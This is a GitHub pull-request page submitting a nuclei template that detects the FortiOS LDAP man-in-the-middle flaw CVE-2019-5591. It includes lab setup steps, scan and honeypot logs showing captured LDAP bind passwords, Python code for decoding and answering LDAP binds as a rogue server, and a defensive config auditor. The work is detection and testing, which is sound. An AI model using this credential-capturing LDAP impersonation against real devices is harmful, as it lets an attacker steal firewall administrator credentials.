
Conversation

@ayewo ayewo commented Oct 16, 2025

Template / PR Information

Prior to using the nuclei command to run the CVE-2019-5591.yaml template included in this PR, you need to first impersonate the LDAP server on the network using a Python script. This is so you can intercept all LDAP credentials from any authentication attempts made by FortiOS on behalf of any (administrative) end user.

The impersonation script will serve as our OOB mechanism so we can reliably detect if a target FortiGate device is running a version of FortiOS that is vulnerable to the MITM attack.

You can use my PoC ldap_honeypot.py for this.
ldap_honeypot.py is started like so:

sudo python3 ldap_honeypot.py

LDAP Honeypot Server started on 0.0.0.0:389
Waiting for connections...

Explanation of the OOB Mechanism

To trigger the vulnerability, the CVE-2019-5591.yaml template generates a random (non-existent) user and uses the interactsh-url as the user's password. These credentials are then sent over HTTP/S to the FortiGate web interface for LDAP authentication, as can be seen in the output from my local testing of the template below.

Once LDAP credentials are received by ldap_honeypot.py, it parses out the LDAP server's admin credentials as well as the end user's password, which is an OAST URL.

The script then makes a simple GET request against the OAST URL, triggering a DNS lookup and an HTTP request.

If those 2 events are received by the nuclei template's interactsh-protocol client, then it is conclusive proof that the target FortiGate device has an LDAP misconfiguration vulnerability.


README.md

Instructions on how to download a legal copy of FortiOS v6.2.0 have been sent to [email protected].

1.1. Affected Products

CVE-2019-5591 - FortiOS - Man-in-the-Middle

These versions are vulnerable:

| Version     | Affected            | Solution                  |
|-------------|---------------------|---------------------------|
| FortiOS 7.0 | Not affected        | Not Applicable            |
| FortiOS 6.0 | 6.0.3 through 6.2.0 | Upgrade to 6.2.1 or above |

For the PoC I used FortiOS 6.2.0 in a VM. These instructions were tested on macOS Sequoia 15.6 and should be easy to adapt for any OS.

Note

This document uses the terms "FortiGate" and "FortiOS" interchangeably.

1.2. Obtaining the Affected Products

Fortinet offers free downloads of its products from its Support site once you create a free account with a valid email address (and phone number).

1.2.1. Obtaining FortiGate

Unfortunately, I was unable to see FortiOS 6.2.0 in the "Downloads" -> "VM Images" section of the Fortinet Support site.

They only show a limited selection of their older products for download on the "Earlier Versions" tab as can be seen in this screenshot:

[screenshot: "Earlier Versions" tab of the Fortinet Support downloads page]

The screenshot lists only these older FortiOS (FortiGate) versions for download:

  • 7.6.3
  • 7.4.8
  • 7.2.12

Notwithstanding, I figured out a way to obtain legal copies of those older versions.

Tip

The step-by-step process is in section 1.2.2. - 1.2.3 which has been emailed privately to [email protected].

1.3. Lab Environment

1.3.1. Network Configuration

At least two network nodes are required (either VMs or physical machines). The nodes must be on the same local subnet and able to communicate with each other.

  • One node for the FortiGate (FortiOS VM).
  • One node for the LDAP server (Ubuntu Linux).
  • One node for the Attacker that will impersonate the LDAP server (macOS).

1.3.2. Scenario

  • Node 1 (Victim/Target): A FortiGate firewall running a vulnerable version of FortiOS (6.2.0 or below) configured to use an external LDAP server for authentication.
    • FortiGate config: A minimally configured device with an external LDAP server config lacking the server-identity-check (disabled by default) allows an easy demo of this vulnerability.
  • Node 2 (LDAP Server): An Ubuntu Linux Docker image running slapd as the LDAP server to be used by FortiGate for authentication.
  • Node 3 (Attacker): The LDAP server will be impersonated by an Attacker that will execute the Python PoC script (ldap_honeypot.py) that will exfiltrate credentials.

Based on my lab setup, here's the same info as above but in tabular form:

| Node | Role                        | OS                              | IP Address     |
|------|-----------------------------|---------------------------------|----------------|
| 1    | Victim/Target               | FortiGate (VMware guest OS)     | 192.168.43.111 |
| 2    | LDAP Server                 | Ubuntu Linux (Docker container) | 192.168.43.24  |
| 3    | Attacker (ldap_honeypot.py) | macOS (Host OS)                 | 192.168.43.24  |

1.3.3. LDAP Server Setup

The LDAP server is a Docker image listening on 192.168.43.24:389 running Ubuntu Linux. It is based on this Ubuntu Linux Docker image by GNS3[^1] (because my 3-node lab was originally built using GNS3 but it was too cumbersome for local testing).

Now start the LDAP server with:

docker run -it -p 389:389 -p 636:636 --name ldap-server ayewo/ubuntu-ldap-server:1.1

...
 * Starting OpenLDAP slapd                                                                                                                                         [ OK ] 
Adding admin user to LDAP using LDAP_ROOT_ADMIN credentials...
adding new entry "cn=fortigate_user,dc=example,dc=com"
...
LDAP Server started successfully!
LDAP Suffix: dc=example,dc=com
LDAP Root Admin DN: cn=admin,dc=example,dc=com
LDAP URI: ldap://localhost:389
...

The LDAP server should now contain the following user accounts:

| Username       | Password            | Role       |
|----------------|---------------------|------------|
| admin          | ldapAdMiNPassw0rd!  | LDAP admin |
| fortigate_user | SuPeRsEcReTpassw0rd | LDAP user  |

1.3.4. FortiGate Setup

  1. After downloading the VMware zip file for FortiOS v6.2.0, extract it, then import the file named FortiGate-VM64.hw04.ovf into VMware. This image is configured with 4 network adapters (while FortiGate-VM64.hw07_vmxnet3.ovf is configured to have 10 NICs).

  2. Check the VM settings to ensure that it only has 1 vCPU and 1024 MB of RAM allocated in VMware, otherwise it will start up with an invalid license (FGVM00UNLICENSED) and, more importantly, the invalid license will cause the LDAP authentication feature to be disabled.

  3. Next start up the VM, copy its IP address, then log into FortiOS over SSH as admin with no password. In my lab, this is simply:

  4. After you log in, the OS will perform some housekeeping like disk formatting etc. and then reboot. After the reboot, confirm your instance's license is a 15-day trial. You can check your license status with the diagnose debug vm-print-license command:

     diagnose debug vm-print-license
     VM License Info
     Serial number: FGVMEVLJ6KYYEQ6B
     License Allowance: 1 CPUs and 1024 MB RAM.
     License created: Tue Oct 14 11:36:19 2025
     Evaluation license expires: Wed Oct 29 11:36:19 2025

  5. If your license says "Expired on 1970/01/01" or you receive the error:

     Admin sessions removed because license registration status changed to 'INVALID'

     the fix is to run:

     exec factoryreset

  6. Next set up the LDAP server credentials and grant the super_admin user group permission to manage the device remotely via the web interface:

     config user ldap
         edit ldap-server
             set server "192.168.43.24"
             set port 389
             set cnid "cn"
             set dn "dc=example,dc=com"
             set type regular
             set username "cn=admin,dc=example,dc=com"
             set password "ldapAdMiNPassw0rd!"
         next
     end

     config user group
         edit ldap-users
             set member ldap-server
         next
     end

     config system admin
         edit "ldap-admin"
             set remote-auth enable
             set accprofile "super_admin"
             set vdom "root"
             set wildcard enable
             set remote-group "ldap-users"
         next
     end

  7. Test that authentication works against the external LDAP server. LDAP testing will be done in 3 - 4 steps:

     1. Enable debug output for 30 mins so you can see where things might be going wrong:

        diagnose debug application fnbamd 255
        Debug messages will be on for 30 minutes.

     2. Confirm the LDAP server (at 192.168.43.24) is reachable from FortiOS (192.168.43.111) via execute ping 192.168.43.24:

        execute ping 192.168.43.24
        PING 192.168.43.24 (192.168.43.24): 56 data bytes
        64 bytes from 192.168.43.24: icmp_seq=0 ttl=64 time=1.2 ms
        64 bytes from 192.168.43.24: icmp_seq=1 ttl=64 time=0.9 ms
        64 bytes from 192.168.43.24: icmp_seq=2 ttl=64 time=0.9 ms
        64 bytes from 192.168.43.24: icmp_seq=3 ttl=64 time=0.3 ms
        64 bytes from 192.168.43.24: icmp_seq=4 ttl=64 time=0.3 ms

        --- 192.168.43.24 ping statistics ---
        5 packets transmitted, 5 packets received, 0% packet loss
        round-trip min/avg/max = 0.3/0.7/1.2 ms

     3. Test authentication against the external LDAP server as the user fortigate_user with password SuPeRsEcReTpassw0rd:

        diagnose test authserver ldap ldap-server fortigate_user SuPeRsEcReTpassw0rd
        authenticate 'fortigate_user' against 'ldap-server' succeeded!

     4. You should also be able to log in to the FortiOS web interface at http://192.168.43.111 with fortigate_user / SuPeRsEcReTpassw0rd.

1.3.5. Attacker Setup

For the attacker, you can either intercept VLAN traffic meant for the LDAP server at 192.168.43.24:389, or simply terminate the LDAP server and launch ldap_honeypot.py at the same address.

Note that sudo is required to allow us to bind on port 389 when starting ldap_honeypot.py:

sudo python3 ldap_honeypot.py

LDAP Honeypot Server started on 0.0.0.0:389
Waiting for connections...

1.3.6. LDAP Misconfiguration Vulnerability

Running the nuclei template should correctly report that FortiOS v6.2.0 is vulnerable to the LDAP MITM attack:

nuclei -t CVE-2019-5591.yaml -target http://192.168.43.111 -debug -vv -svd 

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

nuclei -t CVE-2019-5591.yaml -target http://192.168.43.111 -vv -debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2019-5591] FortiGate - Insecure LDAP Configuration Detection (@ayewo) [medium]
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2019-5591] Dumped HTTP request for http://192.168.43.111/logincheck

POST /logincheck HTTP/1.1
Host: 192.168.43.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 80
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cache-Control: no-store, no-cache, must-revalidate
Connection: keep-alive
Content-Type: text/plain;charset=UTF-8
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Origin: http://192.168.43.111
Pragma: no-cache
Referer: http://192.168.43.111/login

ajax=1&username=RLDETupQGg&secretkey=d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
[DBG] [CVE-2019-5591] Dumped HTTP response http://192.168.43.111/logincheck

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset=utf-8
Date: Thu, 16 Oct 2025 22:47:06 GMT
Server: 
Set-Cookie: APSCOOKIE_10657718821196653669="Era%3D0%26Payload%3Dmuz81q6ns3coID0hnxxN+vQzuRp0Q4lnup6DHkvE+m%2FVxQXw0GKRWUX4GUa+LZWi%0AUkJg0QWCb+WjlCpXpFGg+Yoh8HwxzEA%2FlsqFy0hHb7cCyojLpAVfXlrHHwIAuiNc%0Aefms6WcWGt13652ottrvusM31lZXQk%2F3he7RgMrfMwCA7kg5kjPJAw%3D%3D%0A%26AuthHash%3DxJ2dsz+4VHMERKWPx9Qbx%2Fsnv4MA%0A"; path=/; HttpOnly; SameSite=Strict
Set-Cookie: ccsrftoken_10657718821196653669="F7E2274126D6763EAB127F4BD93F9E"; path=/; SameSite=Strict
Set-Cookie: ccsrftoken="F7E2274126D6763EAB127F4BD93F9E"; path=/; SameSite=Strict
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=Edge
X-Xss-Protection: 1; mode=block

1document.location="/ng/prompt?viewOnly&redir=%2Fng";
[D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q] Received DNS interaction from 172.253.249.212 at 2025-10-16 22:47:07
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 33599
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 33599
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	IN	 A

;; ANSWER SECTION:
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	NS	ns1.oast.live.
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2019-5591:status-1] [http] [medium] http://192.168.43.111/logincheck
[CVE-2019-5591:dsl-2] [http] [medium] http://192.168.43.111/logincheck
[CVE-2019-5591:word-3] [http] [medium] http://192.168.43.111/logincheck
[INF] Scan completed in 11.371260277s. 3 matches found.

Here's the corresponding output for ldap_honeypot.py:

[2025-10-16 23:47:06.540145] New connection from 192.168.43.24:55099

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
RLDETupQGg01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live

🔑 CAPTURED PASSWORD: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
🔧 No scheme found — prepending https:// -> https://d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
📡 Attempting GET request to: https://d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 23:47:08.659098] Connection closed from 192.168.43.24:55099

============================================================
SESSION SUMMARY - Captured Password: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
============================================================

This is intended as a proper fix for #13436 in order to /claim #13436

Footnotes

  1. GNS3 is probably most famous as an open source platform used for learning and teaching amongst network engineers.
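The honeypot side of the OOB mechanism described in the PR, as an added example (this is not the PR's ldap_honeypot.py, whose source is not on this page): a stdlib-only decoder for the LDAPv3 simple BindRequest that FortiOS sends, the BindResponse(success) that keeps FortiOS talking, and the check that turns a captured password into the interactsh URL to GET. The BER layout follows RFC 4511; the sample messages are constructed inline from the lab DNs and passwords in the PR description, and the handle_bind flow and the hostname heuristic in oast_url_from_password are this example's own choices rather than anything taken from the PR.

```python
"""Decode/encode LDAPv3 simple BIND messages (RFC 4511, BER) with the stdlib only.

Added example for the PR's OOB mechanism; it is NOT the PR's ldap_honeypot.py.
Only BindRequest (APPLICATION 0) with simple auth and BindResponse
(APPLICATION 1) are handled, which is all an LDAP credential honeypot needs
to read the credentials FortiOS sends and keep the conversation going.
"""
import re
from typing import Dict, Optional, Tuple

# BER tags used by LDAPMessage / BindRequest / BindResponse
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_ENUMERATED = 0x0A
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
TAG_BIND_RESPONSE = 0x61  # [APPLICATION 1] constructed
TAG_SIMPLE_AUTH = 0x80    # AuthenticationChoice: simple [0] OCTET STRING


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode one BER TLV at buf[pos]; returns (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length: next n bytes hold it
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def _tlv(tag: int, value: bytes) -> bytes:
    """Encode a BER TLV, using long-form length when the value is >= 128 bytes."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def _int(n: int) -> bytes:
    """Minimal two's-complement encoding of a non-negative INTEGER (messageID, version)."""
    return n.to_bytes(n.bit_length() // 8 + 1, "big")


def parse_bind_request(msg: bytes) -> Dict[str, object]:
    """Extract message_id, version, dn and password from LDAPMessage{BindRequest{simple}}."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = _read_tlv(body, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError("protocolOp is not a BindRequest")
    _, ver, pos = _read_tlv(op, 0)            # version INTEGER (3 for LDAPv3)
    _, dn, pos = _read_tlv(op, pos)           # name LDAPDN
    tag, auth, _ = _read_tlv(op, pos)         # AuthenticationChoice
    if tag != TAG_SIMPLE_AUTH:
        raise ValueError("only simple authentication is handled (no SASL)")
    return {"message_id": int.from_bytes(mid, "big"),
            "version": int.from_bytes(ver, "big"),
            "dn": dn.decode("utf-8", "replace"),
            "password": auth.decode("utf-8", "replace")}


def build_bind_request(message_id: int, dn: str, password: str) -> bytes:
    """Encode what an LDAP client (here: FortiOS) sends for a simple bind."""
    op = (_tlv(TAG_INTEGER, b"\x03") + _tlv(TAG_OCTET_STRING, dn.encode())
          + _tlv(TAG_SIMPLE_AUTH, password.encode()))
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, _int(message_id)) + _tlv(TAG_BIND_REQUEST, op))


def build_bind_success(message_id: int) -> bytes:
    """Encode BindResponse{resultCode success(0), matchedDN '', diagnosticMessage ''}."""
    op = _tlv(TAG_ENUMERATED, b"\x00") + _tlv(TAG_OCTET_STRING, b"") + _tlv(TAG_OCTET_STRING, b"")
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, _int(message_id)) + _tlv(TAG_BIND_RESPONSE, op))


_HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)


def oast_url_from_password(password: str) -> Optional[str]:
    """Return the URL to GET if the captured password is an interactsh callback, else None.

    Heuristic chosen for this example: a bare hostname gets https:// prepended
    (the behaviour visible in the PR's honeypot output); an ordinary user
    password does not look like a hostname and yields None.
    """
    if password.startswith(("http://", "https://")):
        return password
    return "https://" + password if _HOSTNAME.match(password) else None


def handle_bind(msg: bytes) -> Tuple[Dict[str, object], bytes, Optional[str]]:
    """One honeypot step: parse the credentials, build the success reply, flag the OAST URL."""
    req = parse_bind_request(msg)
    return req, build_bind_success(int(req["message_id"])), oast_url_from_password(str(req["password"]))


if __name__ == "__main__":
    # Constructed sample: the two binds seen in the PR's honeypot output.
    for mid, dn, pw in [(1, "cn=admin,dc=example,dc=com", "ldapAdMiNPassw0rd!"),
                        (3, "dc=example,dc=com", "d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live")]:
        req, resp, url = handle_bind(build_bind_request(mid, dn, pw))
        print(f"BIND #{req['message_id']} dn={req['dn']} password={req['password']}")
        print(f"  reply={resp.hex()} oast_url={url}")
```

In a real listener the bytes come off the accepted socket instead of build_bind_request, and the SearchRequest that FortiOS sends between the two binds (visible in the PR output) needs a SearchResultEntry whose DN is then used for the second bind; that part is left out here because the page does not show how the PR's script builds it.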
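A configuration check for the condition the lab relies on (an external LDAP server entry with no TLS and no server-identity-check), as an added example rather than anything from the PR or the nuclei template: it parses the config user ldap block of a FortiOS CLI dump and reports entries that a spoofed LDAP server could answer. The sample config is the page's own lab entry plus a constructed hardened entry. Assumption: the set secure {disable|starttls|ldaps} and set server-identity-check {enable|disable} settings and their disable defaults are taken from the FortiOS CLI reference as I know it, not from this page, which itself only names server-identity-check.

```python
"""Audit `config user ldap` entries in a FortiOS CLI config for the
plaintext-LDAP / no-server-identity-check condition used in the lab above.

Added example, not part of the PR. Assumed FortiOS settings (from the CLI
reference, not this page): `set secure {disable|starttls|ldaps}` and
`set server-identity-check {enable|disable}`, both defaulting to disable.
"""
import re
from typing import Dict, List

# `set <name> <value>`; values may be quoted
SET_RE = re.compile(r'^set\s+(\S+)\s+(.+)$')


def parse_user_ldap(config: str) -> Dict[str, Dict[str, str]]:
    """Return {entry_name: {setting: value}} for every entry under `config user ldap`."""
    entries: Dict[str, Dict[str, str]] = {}
    in_block, current = False, None
    for raw in config.splitlines():
        line = raw.strip()
        if line == "config user ldap":
            in_block = True
        elif not in_block:
            continue                          # ignore every other config section
        elif line == "end":
            in_block, current = False, None
        elif line.startswith("edit "):
            current = line[5:].strip().strip('"')
            entries[current] = {}
        elif line == "next":
            current = None
        elif current is not None:
            m = SET_RE.match(line)
            if m:
                entries[current][m.group(1)] = m.group(2).strip().strip('"')
    return entries


def audit_user_ldap(config: str) -> Dict[str, List[str]]:
    """Map each LDAP entry name to the weaknesses a MITM could exploit (empty list = OK)."""
    report: Dict[str, List[str]] = {}
    for name, s in parse_user_ldap(config).items():
        issues: List[str] = []
        secure = s.get("secure", "disable")                    # assumed default
        id_check = s.get("server-identity-check", "disable")   # assumed default
        if secure == "disable":
            issues.append("plaintext LDAP: bind DN %s and every user password cross "
                          "the network in clear" % s.get("username", "<unset>"))
        if id_check != "enable":
            issues.append("server-identity-check disabled: a spoofed LDAP server is "
                          "accepted without certificate validation")
        report[name] = issues
    return report


# Constructed sample: the lab entry from the PR description plus a hardened one.
SAMPLE_CONFIG = """
config user ldap
    edit ldap-server
        set server "192.168.43.24"
        set port 389
        set cnid "cn"
        set dn "dc=example,dc=com"
        set type regular
        set username "cn=admin,dc=example,dc=com"
        set password "ldapAdMiNPassw0rd!"
    next
    edit "ldap-secure"
        set server "192.168.43.24"
        set port 636
        set cnid "cn"
        set dn "dc=example,dc=com"
        set type regular
        set username "cn=admin,dc=example,dc=com"
        set password "ldapAdMiNPassw0rd!"
        set secure ldaps
        set server-identity-check enable
    next
end
"""

if __name__ == "__main__":
    for name, issues in audit_user_ldap(SAMPLE_CONFIG).items():
        print(name, "OK" if not issues else "")
        for issue in issues:
            print("  -", issue)
```

Run it against a `show user ldap` dump saved from the device; the weak lab entry produces two findings, the hardened entry none. An entry with set secure starttls but without server-identity-check still gets one finding, because TLS without identity validation is exactly what an impersonating server can satisfy.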

ayewo (Author) commented Oct 20, 2025

Hey @princechaddha @ritikchaddha @pussycat0x

Would appreciate a look at my PR, thanks.

ayewo (Author) commented Nov 1, 2025

Hi @princechaddha @ritikchaddha @pussycat0x @DhiyaneshGeek

This PR has been open for a while now.

Can anyone please take a look?

ritikchaddha (Contributor) commented:

Hello @ayewo, thank you for sharing this template with us. Can you confirm if you have tested this template against the actual FortiOS server or the dummy server?

ayewo (Author) commented Nov 1, 2025

@ritikchaddha Yes, absolutely.

I've included debug output from my testing against a lab copy of FortiOS 6.2.0 at the end of my PR's description.

ayewo force-pushed the fortios_ldap_mitm_CVE-2019-5591 branch from b6e9a64 to 712c29f on November 1, 2025 15:45
ritikchaddha (Contributor) commented Nov 5, 2025

Please share the reference for the setup you used. Also, DM me with the information on Discord. Join our discord server and you can find me.

ayewo (Author) commented Nov 5, 2025

@ritikchaddha

Most of the information you need is already present in the PR description above. The info that was omitted was emailed to [email protected] and I've DMed you the exact info on Discord.

If you are still not clear, the step-by-step setup instructions are reproduced in full in the README.md section of my PR description above (sections 1.1 through 1.3.6).

Remove as per feedback on Discord.
ayewo changed the title from "feat: add template for CVE-2019-5591 - FortiOS - Man-in-the-Middle" to "Add template for CVE-2019-5591 - FortiOS - Man-in-the-Middle" on Nov 10, 2025